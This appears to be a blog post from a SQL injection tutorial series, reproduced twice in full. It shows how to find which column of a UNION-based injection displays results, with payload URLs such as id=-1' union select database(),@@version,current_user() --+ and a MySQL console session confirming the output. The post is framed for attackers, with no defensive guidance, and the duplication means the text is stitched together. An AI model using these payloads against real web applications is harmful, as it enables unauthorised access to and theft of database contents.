Finding Injectable Column
Okay so now that we know how to find out columns count using 'order by' lets take one step further, and lets try to find out the injectable column(Or the attacking column, which would display our query result)
So lets assume we have the same URL:
http://www.example.com/index.php?id=1
And we know there are 3 columns.
http://www.example.com/index.php?id= ' 1' --+'
http://www.example.com/index.php?id= 1' ORDER BY 3--+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 4--+ >> Error
So we know there are three columns.
Now lets try to find out the injectable column, and for this we use 'UNION' Query with Another Select Statement.
Now if we look at the URL carefully...
http://www.example.com/index.php?id=1
In SQL,
SELECT col1, col2, col3 FROM products WHERE id=1; (We know there are three columns by the 'ORDER BY' Query)
Now left side is using three columns, we have to balance it by using 3 columns on the right side.
SELECT col1, col2, col3 FROM products WHERE id = 1 UNION SELECT col1,col2,col3;
Lets check the same in SQL First
===================================================================
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.16 MySQL Community Server (GPL)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cdcol |
| ckorner |
| mysql |
| performance_schema |
| phpmyadmin |
| test |
| webauth |
+--------------------+
8 rows in set (0.00 sec)
mysql> use ckorner;
Database changed
mysql> select * from products where id = 1;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id = 1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> select * from products where id = 1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id = 1 union select 1,2,3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 1 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, "foo", "bar";
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | foo | bar |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, 20, 50;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | 20 | 50 |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, Null, Null;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | NULL | NULL |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select database(), Null, Null;
+---------+---------+-------+
| id | name | price |
+---------+---------+-------+
| 1 | Printer | 4500 |
| ckorner | NULL | NULL |
+---------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select database(), current_user(), @@version;
+---------+----------------+--------+
| id | name | price |
+---------+----------------+--------+
| 1 | Printer | 4500 |
| ckorner | root@localhost | 5.5.16 |
+---------+----------------+--------+
2 rows in set (0.00 sec)
mysql> quit;
=====================================================================
Okay here, 'union' has a very basic work, it just balances both sides, by adding a false value, and shows column number where we can inject our query.
Generally we do 'union select 1,2,3,4...and go on' But sometimes, we might see same number appearing twice, it is then when we change the numbers like 10,20,Null,"Foo", etc to distinguish.
So in this case,
http://www.example.com/index.php?id= ' 1' union select 1,2,3 --+'
Displayed 1 2 3 means all the columns are injectable, it it would have displayed 2, means only column 2 is injectable, and so on.
So, if we send a Query like this:
http://www.example.com/index.php?id= 1' union select database(),@@version,current_user() --+
This will Display The Normal Page, because there is No Error. So we need to generate the error, not by removing the single quote, but by giving an arbitrary select value
http://www.example.com/index.php?id= 99' union select database(),@@version,current_user() --+
or,
http://www.example.com/index.php?id= -1' union select database(),@@version,current_user() --+
This will display:
ckorner 5.5.16 root@localhost
Where,
ckorner << Database Name
5.5.16 << MySQL Version
root@localhost << current user
Thats all for this post.
Thank You!
Okay so now that we know how to find out columns count using 'order by' lets take one step further, and lets try to find out the injectable column(Or the attacking column, which would display our query result)
So lets assume we have the same URL:
http://www.example.com/index.php?id=1
And we know there are 3 columns.
http://www.example.com/index.php?id= ' 1' --+'
http://www.example.com/index.php?id= 1' ORDER BY 3--+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 4--+ >> Error
So we know there are three columns.
Now lets try to find out the injectable column, and for this we use 'UNION' Query with Another Select Statement.
Now if we look at the URL carefully...
http://www.example.com/index.php?id=1
In SQL,
SELECT col1, col2, col3 FROM products WHERE id=1; (We know there are three columns by the 'ORDER BY' Query)
Now left side is using three columns, we have to balance it by using 3 columns on the right side.
SELECT col1, col2, col3 FROM products WHERE id = 1 UNION SELECT col1,col2,col3;
Lets check the same in SQL First
===================================================================
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.16 MySQL Community Server (GPL)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cdcol |
| ckorner |
| mysql |
| performance_schema |
| phpmyadmin |
| test |
| webauth |
+--------------------+
8 rows in set (0.00 sec)
mysql> use ckorner;
Database changed
mysql> select * from products where id = 1;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id = 1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> select * from products where id = 1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id = 1 union select 1,2,3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 1 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, "foo", "bar";
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | foo | bar |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, 20, 50;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | 20 | 50 |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select Null, Null, Null;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| NULL | NULL | NULL |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select database(), Null, Null;
+---------+---------+-------+
| id | name | price |
+---------+---------+-------+
| 1 | Printer | 4500 |
| ckorner | NULL | NULL |
+---------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select database(), current_user(), @@version;
+---------+----------------+--------+
| id | name | price |
+---------+----------------+--------+
| 1 | Printer | 4500 |
| ckorner | root@localhost | 5.5.16 |
+---------+----------------+--------+
2 rows in set (0.00 sec)
mysql> quit;
=====================================================================
Okay here, 'union' has a very basic work, it just balances both sides, by adding a false value, and shows column number where we can inject our query.
Generally we do 'union select 1,2,3,4...and go on' But sometimes, we might see same number appearing twice, it is then when we change the numbers like 10,20,Null,"Foo", etc to distinguish.
So in this case,
http://www.example.com/index.php?id= ' 1' union select 1,2,3 --+'
Displayed 1 2 3 means all the columns are injectable, it it would have displayed 2, means only column 2 is injectable, and so on.
So, if we send a Query like this:
http://www.example.com/index.php?id= 1' union select database(),@@version,current_user() --+
This will Display The Normal Page, because there is No Error. So we need to generate the error, not by removing the single quote, but by giving an arbitrary select value
http://www.example.com/index.php?id= 99' union select database(),@@version,current_user() --+
or,
http://www.example.com/index.php?id= -1' union select database(),@@version,current_user() --+
This will display:
ckorner 5.5.16 root@localhost
Where,
ckorner << Database Name
5.5.16 << MySQL Version
root@localhost << current user
Thats all for this post.
Thank You!
0 comments:
Post a Comment